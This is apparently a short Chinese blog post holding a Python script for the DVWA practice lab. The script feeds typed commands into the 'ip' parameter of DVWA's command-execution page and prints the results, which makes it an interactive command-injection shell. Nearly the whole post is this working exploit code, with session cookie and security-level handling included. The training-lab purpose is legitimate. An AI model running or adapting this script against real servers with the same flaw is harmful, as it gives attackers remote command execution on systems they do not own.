DVWA命令執行簡單指令碼
阿新 • • 發佈:2021-02-11
import requests
from bs4 import BeautifulSoup
url = 'http://ip地址/dvwa/vulnerabilities/exec/'
def command_inject(command):
Cookies = dict(security='low', PHPSESSID=' xxxxxxxx ')
payload = {
"ip": command,
"Submit": "Submit"
}
reponse = requests.post(url=url,cookies=Cookies,data=payload).text
#例項化物件
soup = BeautifulSoup(reponse,'lxml')
#定位標籤
content_tag = soup.find_all(name='pre')
#列印命令執行結果
for content in content_tag:
print(content.string)
while 1:
cmd = input('quit->>退出\n輸入執行命令:' )
if len(cmd) == 0:
continue
if cmd =='quit':
break
command_inject(cmd)